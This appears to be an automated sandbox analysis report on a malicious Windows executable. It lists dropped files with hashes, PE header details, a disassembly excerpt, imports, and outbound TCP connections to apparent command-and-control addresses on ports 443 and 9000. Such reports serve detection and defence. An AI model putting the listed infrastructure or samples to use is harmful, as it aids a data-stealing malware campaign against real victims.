                                                  Malicious:true
                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.2.9.1.5.3.7.5.8.2.5.5.3.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.2.9.1.5.3.7.9.7.3.1.7.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.b.f.8.3.4.f.7.-.d.4.7.6.-.4.e.1.0.-.b.c.4.d.-.9.6.a.4.0.1.5.6.e.b.b.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.2.4.8.7.7.9.0.-.2.8.a.7.-.4.9.3.f.-.b.0.5.4.-.3.0.c.7.8.9.e.e.5.9.5.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.5.6.b.D.g.H.9.s.M.Q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.3.8.-.0.0.0.1.-.0.0.1.4.-.b.7.7.c.-.6.f.0.1.8.6.c.b.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.8.f.6.e.1.2.5.0.b.f.6.6.6.7.9.3.c.f.d.c.2.7.d.6.d.1.6.9.3.1.b.0.0.0.0.f.f.f.f.!.0.0.0.0.0.0.6.6.f.d.4.4.e.2.c.d.9.2.9.3.a.f.4.1.4.f.7.3.5.b.d.8.0.4.5.6.f.4.e.3.e.b.1.d.!.5.6.b.D.g.H.9.s.M.Q...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC95.tmp.dmp

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Mini DuMP crash report, 14 streams, Mon Jul 1 07:12:17 2024, 0x1205a4 type
                                                  Category:dropped
                                                  Size (bytes):48650
                                                  Entropy (8bit):1.6840053985586496
                                                  Encrypted:false
                                                  SSDEEP:192:9tap8+Oeascea3xJgJocg1LHK/qOLnEes:HF5Gc937gJocg1zK/qb
                                                  MD5:9454163361A89B5F578A2A363BCD5E1F
                                                  SHA1:B9DC974D8FD7EB2203D7839A0A53F8F61CCB3D7A
                                                  SHA-256:898C2EA1BD7606737F3E66CA0824CDBEDD616C37160FE8CAA56C3366A87B7690
                                                  SHA-512:3A387B76085BACE0426D5FD57C0F266C7BFC750074AD1AD40D81FC79D10040FDB68081C7F26F8EF8202C98235CB6C68BA66EA5556CA98AFD2657D25CE1CCE9C8
                                                  Malicious:false
                                                  Preview:MDMP..a..... ........V.f........................0...........t...n$..........T.......8...........T...............z...........,...........................................................................................eJ..............GenuineIntel............T.......8....V.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD03.tmp.WERInternalMetadata.xml

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):8302
                                                  Entropy (8bit):3.693791566712483
                                                  Encrypted:false
                                                  SSDEEP:192:R6l7wVeJIc6jb6Y9USUAQZigmfNJDfprT89bTGqsfkBcm:R6lXJL6f6Y+SUBigmfNJDWyJfc
                                                  MD5:24C3B04D0F5B88A2818497D697D4236A
                                                  SHA1:8E1B4777545F2E5DB34EF6A2532E92940CF4E616
                                                  SHA-256:E4932DB9DD88F879209011805F74D9995BB485E59017EAE09CC4E442DF077B27
                                                  SHA-512:BBD62227C006BE4ADF816CDF8541780EF30CCF14689E81DDB16653AC89D3418226C867296B16CF6C5BAE29A902F224B67F0DB98999FCCD5BE683771B7B86C4D1
                                                  Malicious:false
                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.3.6.<./.P.i.

                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD43.tmp.xml

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4585
                                                  Entropy (8bit):4.463322871864609
                                                  Encrypted:false
                                                  SSDEEP:48:cvIwWl8zs7Jg77aI9U3WpW8VYfyYm8M4Jy/8QNiFY+q8DWQcrTCUdkU3d:uIjfVI7qG7ViJAVwC3j3d
                                                  MD5:96F403094D9DE84191AF86990F6B9C47
                                                  SHA1:C12BC2B200C7424E251A3427FF9C22E055A5BF6B
                                                  SHA-256:CDC312DD464812B365D051FB93C1F12162AD12A03AC73F031ED99E0D58B72FF1
                                                  SHA-512:9C32FE37354BB16B9E9D90732BAEB31EC49717B47F0D51FB7EA169ED81814ADD4863669D936BC53DE0887A8B9C6C5E415725C4EB123508BE3538DEFBD2F4CDC0
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="391574" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                  Category:dropped
                                                  Size (bytes):71954
                                                  Entropy (8bit):7.996617769952133
                                                  Encrypted:true
                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                  Malicious:false
                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):290
                                                  Entropy (8bit):2.9599869033579713
                                                  Encrypted:false
                                                  SSDEEP:6:kKyT9Usw9L+N+SkQlPlEGYRMY9z+4KlDA3RUe/:KqD9LNkPlE99SNxAhUe/
                                                  MD5:C52E2193D5BA95BACD3E2BEE315815FA
                                                  SHA1:DE4CE259195497A1B06C722458BA5525A14C70A9
                                                  SHA-256:165F19F8A72938B46A88F53DF01EBBA2C892F25D2AF64583AA556EE99143DDDE
                                                  SHA-512:1955B60135D9D89354B5EC7085107C2EAC5B7E9E1661F8A597FC96CB4F4DBA8F812A8AA06A282CBACA3F125DBB2A456CA2DD4AE211A173A7A8946319A79EA76E
                                                  Malicious:false
                                                  Preview:p...... .........t......(....................................................... ........G..@.......................h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlt[1].dll

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2459136
                                                  Entropy (8bit):6.052474106868353
                                                  Encrypted:false
                                                  SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                  MD5:90E744829865D57082A7F452EDC90DE5
                                                  SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                  SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                  SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: vjYcExA6ou.exe, Detection: malicious, Browse
                                                  • Filename: 2E7ZdlxkOL.exe, Detection: malicious, Browse
                                                  • Filename: S8co1ACRdn.exe, Detection: malicious, Browse
                                                  • Filename: M9dfZzH3qn.exe, Detection: malicious, Browse
                                                  • Filename: 5IRIk4f1PO.exe, Detection: malicious, Browse
                                                  • Filename: 1719520929.094843_setup.exe, Detection: malicious, Browse
                                                  • Filename: 1Cvd8TyYPm.exe, Detection: malicious, Browse
                                                  • Filename: WR0fuHnEVW.exe, Detection: malicious, Browse
                                                  • Filename: BRWgvKaqbg.exe, Detection: malicious, Browse
                                                  • Filename: vidar2406.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:MS Windows registry file, NT/2000 or above
                                                  Category:dropped
                                                  Size (bytes):1835008
                                                  Entropy (8bit):4.465442754137135
                                                  Encrypted:false
                                                  SSDEEP:6144:NIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNtdwBCswSbB:eXD94+WlLZMM6YFHb+B
                                                  MD5:4ADACAA5D41677E9452880ABFB9C9627
                                                  SHA1:1181F1F71C640FA0A5C97AEB2DD877C5584BE36B
                                                  SHA-256:50354B8D3F13FA6AF14578773876927AAC0BE7C02766761BD7403326379BFBE6
                                                  SHA-512:12360760CE2302DEAFF5E019A579D5EFC78BBF6AFCE1DEF6B067006B6556BCF0A873C8A544001F6BBBFCF7AB8196BDFE8B67E09D6868C773AA5F8545DA6A1C3C
                                                  Malicious:false
                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmn..................................................................................................................................................................................................................................................................................................................................................N..5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.502731457989579
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:56bDgH9sMQ.exe
                                                  File size:430'592 bytes
                                                  MD5:f88272ea7674d3acedd8adcf7643c598
                                                  SHA1:0066fd44e2cd9293af414f735bd80456f4e3eb1d
                                                  SHA256:fad264acc346be1e63cd47611cd305cb9c894a13843119e22e87744808295387
                                                  SHA512:3d3435572767b85307271519a5a51668e284cc9aa0d09bf024aaff31a4b4329bb189c627ceda90ba00f02445f0d34f4de642b30b054ecf9d1ac88babeb113963
                                                  SSDEEP:12288:Zh0vCnLVT7zishmwaOF9dJl3AnhpzTly:Z8kLVPzMO9dnQnhZT
                                                  TLSH:4B94D000B8D18072D56312360AE4DBB59EBEB8710BB659DFA7D40B3F9F302D1973265A
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._..._..._.......N...............I....q..M....q..J.......X..._........q.......r..^....r..^....r..^...Rich_..................

                                                  File Icon

                                                  Icon Hash:90cececece8e8eb0

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x409267
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x667E8856 [Fri Jun 28 09:54:30 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:6
                                                  OS Version Minor:0
                                                  File Version Major:6
                                                  File Version Minor:0
                                                  Subsystem Version Major:6
                                                  Subsystem Version Minor:0
                                                  Import Hash:9d5b9d61589b83a7f2c3d41f757e8ae0

                                                  Entrypoint Preview

                                                  Instruction
                                                  call 00007F69C0AE26FAh
                                                  jmp 00007F69C0AE1F59h
                                                  push ebp
                                                  mov ebp, esp
                                                  jmp 00007F69C0AE20EFh
                                                  push dword ptr [ebp+08h]
                                                  call 00007F69C0AEEBD9h
                                                  pop ecx
                                                  test eax, eax
                                                  je 00007F69C0AE20F1h
                                                  push dword ptr [ebp+08h]
                                                  call 00007F69C0AE973Dh
                                                  pop ecx
                                                  test eax, eax
                                                  je 00007F69C0AE20C8h
                                                  pop ebp
                                                  ret
                                                  cmp dword ptr [ebp+08h], FFFFFFFFh
                                                  je 00007F69C0AE29EFh
                                                  jmp 00007F69C0ADE961h
                                                  push ebp
                                                  mov ebp, esp
                                                  push dword ptr [ebp+08h]
                                                  call 00007F69C0AE29FBh
                                                  pop ecx
                                                  pop ebp
                                                  ret
                                                  jmp 00007F69C0AE29F3h
                                                  cmp ecx, dword ptr [00467F00h]
                                                  jne 00007F69C0AE20E3h
                                                  ret
                                                  jmp 00007F69C0AE2A12h
                                                  push ebp
                                                  mov ebp, esp
                                                  test byte ptr [ebp+08h], 00000001h
                                                  push esi
                                                  mov esi, ecx
                                                  mov dword ptr [esi], 004294B8h
                                                  je 00007F69C0AE20ECh
                                                  push 0000000Ch
                                                  push esi
                                                  call 00007F69C0AE20AAh
                                                  pop ecx
                                                  pop ecx
                                                  mov eax, esi
                                                  pop esi
                                                  pop ebp
                                                  retn 0004h
                                                  push ebp
                                                  mov ebp, esp
                                                  mov eax, dword ptr [ebp+08h]
                                                  push esi
                                                  mov ecx, dword ptr [eax+3Ch]
                                                  add ecx, eax
                                                  movzx eax, word ptr [ecx+14h]
                                                  lea edx, dword ptr [ecx+18h]
                                                  add edx, eax
                                                  movzx eax, word ptr [ecx+06h]
                                                  imul esi, eax, 28h
                                                  add esi, edx
                                                  cmp edx, esi
                                                  je 00007F69C0AE20FBh
                                                  mov ecx, dword ptr [ebp+0Ch]
                                                  cmp ecx, dword ptr [edx+0Ch]
                                                  jc 00007F69C0AE20ECh
                                                  mov eax, dword ptr [edx+08h]
                                                  add eax, dword ptr [edx+0Ch]
                                                  cmp ecx, eax
                                                  jc 00007F69C0AE20EEh
                                                  add edx, 28h
                                                  cmp edx, esi
                                                  jne 00007F69C0AE20CCh
                                                  xor eax, eax
                                                  pop esi
                                                  pop ebp
                                                  ret
                                                  mov eax, edx
                                                  jmp 00007F69C0AE20DBh
                                                  push esi
                                                  call 00007F69C0AE2B7Ah

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x329f00x50.rdata
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x32a400x50.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x6b0000x1f34.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x309580x1c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x308980x40.rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x280000x164.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x258370x25a00fc9bd41652ae1c3a0e37ca698dd95bf0False0.5627919954318937data6.645977488914615IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .BsS0x270000xe4d0x1000c60cb75b55b0360ef647856eead62e0fFalse0.586669921875data6.069768915980845IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x280000xb2660xb4005e6632026bcbb24e9d88e9402b6ada63False0.4210069444444444data5.045364945421655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x340000x360f40x35000b0d5fde2711702bed068653954b5d3cdFalse0.982689047759434data7.984268247554252IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .reloc0x6b0000x1f340x2000842a65f9b0a414aeb786ee4c45f53f77False0.7607421875data6.516771118658397IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Imports

                                                  DLLImport
                                                  GDI32.dllPolyline
                                                  USER32.dllOffsetRect
                                                  KERNEL32.dllCreateFileW, HeapSize, GetProcessHeap, SetStdHandle, WaitForSingleObject, CreateThread, VirtualAlloc, CloseHandle, WaitForSingleObjectEx, GetCurrentThreadId, GetExitCodeThread, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, QueryPerformanceCounter, ReleaseSRWLockExclusive, WakeAllConditionVariable, EncodePointer, DecodePointer, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, GetCPInfo, IsProcessorFeaturePresent, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, SetEnvironmentVariableW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, GetFileType, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW

                                                  Exports

                                                  NameOrdinalAddress
                                                  IUAhsiuchniuohAIU10x427d10

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jul 1, 2024 09:12:29.286595106 CEST49729443192.168.2.4149.154.167.99
                                                  Jul 1, 2024 09:12:29.286647081 CEST44349729149.154.167.99192.168.2.4
                                                  Jul 1, 2024 09:12:29.286734104 CEST49729443192.168.2.4149.154.167.99
                                                  Jul 1, 2024 09:12:29.292526960 CEST49729443192.168.2.4149.154.167.99
                                                  Jul 1, 2024 09:12:29.292536974 CEST44349729149.154.167.99192.168.2.4
                                                  Jul 1, 2024 09:12:30.000675917 CEST44349729149.154.167.99192.168.2.4
                                                  Jul 1, 2024 09:12:30.000760078 CEST49729443192.168.2.4149.154.167.99
                                                  Jul 1, 2024 09:12:30.052889109 CEST49729443192.168.2.4149.154.167.99
                                                  Jul 1, 2024 09:12:30.052903891 CEST44349729149.154.167.99192.168.2.4
                                                  Jul 1, 2024 09:12:30.053193092 CEST44349729149.154.167.99192.168.2.4
                                                  Jul 1, 2024 09:12:30.053236961 CEST49729443192.168.2.4149.154.167.99
                                                  Jul 1, 2024 09:12:30.056638956 CEST49729443192.168.2.4149.154.167.99
                                                  Jul 1, 2024 09:12:30.104506016 CEST44349729149.154.167.99192.168.2.4
                                                  Jul 1, 2024 09:12:30.263664961 CEST44349729149.154.167.99192.168.2.4
                                                  Jul 1, 2024 09:12:30.263688087 CEST44349729149.154.167.99192.168.2.4
                                                  Jul 1, 2024 09:12:30.263719082 CEST44349729149.154.167.99192.168.2.4
                                                  Jul 1, 2024 09:12:30.263724089 CEST49729443192.168.2.4149.154.167.99
                                                  Jul 1, 2024 09:12:30.263735056 CEST44349729149.154.167.99192.168.2.4
                                                  Jul 1, 2024 09:12:30.263745070 CEST49729443192.168.2.4149.154.167.99
                                                  Jul 1, 2024 09:12:30.263783932 CEST49729443192.168.2.4149.154.167.99
                                                  Jul 1, 2024 09:12:30.263787985 CEST44349729149.154.167.99192.168.2.4
                                                  Jul 1, 2024 09:12:30.263854980 CEST49729443192.168.2.4149.154.167.99
                                                  Jul 1, 2024 09:12:30.265527010 CEST49729443192.168.2.4149.154.167.99
                                                  Jul 1, 2024 09:12:30.265538931 CEST44349729149.154.167.99192.168.2.4
                                                  Jul 1, 2024 09:12:30.270354033 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:30.278695107 CEST900049732195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:30.278858900 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:30.279103994 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:30.285150051 CEST900049732195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:30.970880032 CEST900049732195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:30.970913887 CEST900049732195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:30.970958948 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:30.970958948 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:31.905546904 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:31.910325050 CEST900049732195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:32.104872942 CEST900049732195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:32.104938030 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:32.105325937 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:32.110122919 CEST900049732195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:32.574662924 CEST900049732195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:32.574726105 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:32.586232901 CEST497369000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:32.591006994 CEST900049736195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:32.591078997 CEST497369000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:32.591382027 CEST497369000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:32.596151114 CEST900049736195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:33.251754045 CEST900049736195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:33.251820087 CEST497369000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:33.252275944 CEST497369000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:33.254141092 CEST497369000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:33.256989002 CEST900049736195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:33.258899927 CEST900049736195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:34.038615942 CEST900049736195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:34.038810015 CEST497369000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:34.040028095 CEST497329000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:34.040452003 CEST497379000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:34.047564983 CEST900049737195.201.251.214192.168.2.4
